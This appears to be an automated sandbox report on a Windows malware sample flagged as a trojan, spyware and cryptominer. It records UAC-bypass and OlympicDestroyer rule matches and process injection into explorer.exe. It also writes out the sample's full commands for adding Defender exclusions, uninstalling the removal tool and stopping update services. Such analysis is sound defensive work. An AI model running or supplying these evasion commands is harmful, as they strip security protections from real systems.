                        Source: C:\Windows\explorer.exeCode function: 35_2_027BA7A035_2_027BA7A0
                        Source: C:\Windows\explorer.exeCode function: 35_2_0287148035_2_02871480
                        Source: C:\Windows\explorer.exeCode function: 35_2_028584C035_2_028584C0
                        Source: C:\Windows\explorer.exeCode function: 35_2_0283A41035_2_0283A410
                        Source: C:\Windows\explorer.exeCode function: 35_2_0283651035_2_02836510
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B55D035_2_027B55D0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027E05A035_2_027E05A0
                        Source: C:\Windows\explorer.exeCode function: 35_2_02871A9035_2_02871A90
                        Source: C:\Windows\explorer.exeCode function: 35_2_0287AAF435_2_0287AAF4
                        Source: C:\Windows\explorer.exeCode function: 35_2_0284282A35_2_0284282A
                        Source: C:\Windows\explorer.exeCode function: 35_2_0287B84C35_2_0287B84C
                        Source: C:\Windows\explorer.exeCode function: 35_2_0287090035_2_02870900
                        Source: C:\Windows\explorer.exeCode function: 35_2_02873EB035_2_02873EB0
                        Source: C:\Windows\explorer.exeCode function: 35_2_0283EEC035_2_0283EEC0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027E3EC035_2_027E3EC0
                        Source: C:\Windows\explorer.exeCode function: 35_2_0284FE7035_2_0284FE70
                        Source: C:\Windows\explorer.exeCode function: 35_2_02841F8F35_2_02841F8F
                        Source: C:\Windows\explorer.exeCode function: 35_2_02870FC035_2_02870FC0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027BAF0035_2_027BAF00
                        Source: C:\Windows\explorer.exeCode function: 35_2_027CDC5035_2_027CDC50
                        Source: C:\Windows\explorer.exeCode function: 35_2_02874D9435_2_02874D94
                        Source: C:\Windows\explorer.exeCode function: 35_2_0286FDF035_2_0286FDF0
                        Source: C:\Windows\explorer.exeCode function: 35_2_02875DF035_2_02875DF0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F100036_2_029F1000
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F664036_2_029F6640
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F34B036_2_029F34B0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F5E1036_2_029F5E10
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F6E7036_2_029F6E70
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB02A036_2_02AB02A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A0629036_2_02A06290
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F93C036_2_029F93C0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02ABB0E036_2_02ABB0E0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A881A036_2_02A881A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02ABD6B836_2_02ABD6B8
                        Source: C:\Windows\explorer.exeCode function: 36_2_02ABA67436_2_02ABA674
                        Source: C:\Windows\explorer.exeCode function: 36_2_029FA7A036_2_029FA7A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB148036_2_02AB1480
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A984C036_2_02A984C0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A7A41036_2_02A7A410
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A205A036_2_02A205A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F55D036_2_029F55D0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A7651036_2_02A76510
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB1A9036_2_02AB1A90
                        Source: C:\Windows\explorer.exeCode function: 36_2_02ABAAF436_2_02ABAAF4
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A8282A36_2_02A8282A
                        Source: C:\Windows\explorer.exeCode function: 36_2_02ABB84C36_2_02ABB84C
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB090036_2_02AB0900
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB3EB036_2_02AB3EB0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A23EC036_2_02A23EC0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A7EEC036_2_02A7EEC0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A8FE7036_2_02A8FE70
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A81F8F36_2_02A81F8F
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB0FC036_2_02AB0FC0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029FAF0036_2_029FAF00
                        Source: C:\Windows\explorer.exeCode function: 36_2_02A0DC5036_2_02A0DC50
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB4D9436_2_02AB4D94
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AAFDF036_2_02AAFDF0
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB5DF036_2_02AB5DF0
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                        Source: C:\Windows\explorer.exeCode function: String function: 013C3030 appears 48 times
                        Source: C:\Windows\explorer.exeCode function: String function: 013E3CE0 appears 137 times
                        Source: C:\Windows\explorer.exeCode function: String function: 00C08378 appears 48 times
                        Source: C:\Windows\explorer.exeCode function: String function: 027E3030 appears 48 times
                        Source: C:\Windows\explorer.exeCode function: String function: 02A23030 appears 48 times
                        Source: C:\Windows\explorer.exeCode function: String function: 027C5C20 appears 59 times
                        Source: C:\Windows\explorer.exeCode function: String function: 02A05C20 appears 59 times
                        Source: C:\Windows\explorer.exeCode function: String function: 013A5C20 appears 59 times
                        Source: C:\Windows\explorer.exeCode function: String function: 02803CE0 appears 137 times
                        Source: C:\Windows\explorer.exeCode function: String function: 02A43CE0 appears 137 times
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: String function: 00007FF60AA91394 appears 32 times
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: file.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 4.2.explorer.exe.be0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.0.file.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.2.file.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 36.2.explorer.exe.29f0000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                        Source: 35.2.explorer.exe.27b0000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                        Source: 33.2.explorer.exe.1390000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                        Source: ggbfqxmgkimt.sys.8.drBinary string: \Device\WinRing0_1_2_0
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.mine.winEXE@53/12@2/3
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DCA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,0_2_007DCA00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D2AB0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoUninitialize,0_2_007D2AB0
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1828:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3432:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1924:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\{C3397568-8840-4085-8F6E-BC07C085BB3B}
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1484:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\{EF67FEC6-3B78-4CEC-ADF5-E05B5411BD4E}
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3212:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\{650443EC-0EFE-4819-82E8-5F93F6D2E6A5}
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\{CCEFB138-B038-41E1-AC53-171A4E58AB6A}
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvqxcnws.ruv.ps1Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\explorer.exe
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\explorer.exeJump to behavior
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exeJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCommand line argument: %s\explorer.exe0_2_007C1000
                        Source: C:\Users\user\Desktop\file.exeCommand line argument: %s\svchost.exe0_2_007C1000
                        Source: C:\Users\user\Desktop\file.exeCommand line argument: %s\cmd.exe0_2_007C1000
                        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                        Source: C:\Windows\explorer.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: explorer.exe, explorer.exe, 00000024.00000002.4590293308.0000000002AD8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: explorer.exe, explorer.exe, 00000024.00000002.4590293308.0000000002AD8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: explorer.exe, explorer.exe, 00000024.00000002.4590293308.0000000002AD8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: explorer.exe, 00000004.00000002.4654714736.0000000003790000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2441437406.0000000003318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887254898.0000000001478000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.3723679443.0000000002898000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.4590293308.0000000002AD8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: explorer.exe, 00000021.00000003.2443399488.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2443202191.0000000001211000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2444879394.0000000001241000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2442913585.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2445134867.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2442800365.0000000001201000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3590120838.0000000000E91000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3547811402.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3555528319.0000000002927000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3511812127.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3511903196.0000000002927000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
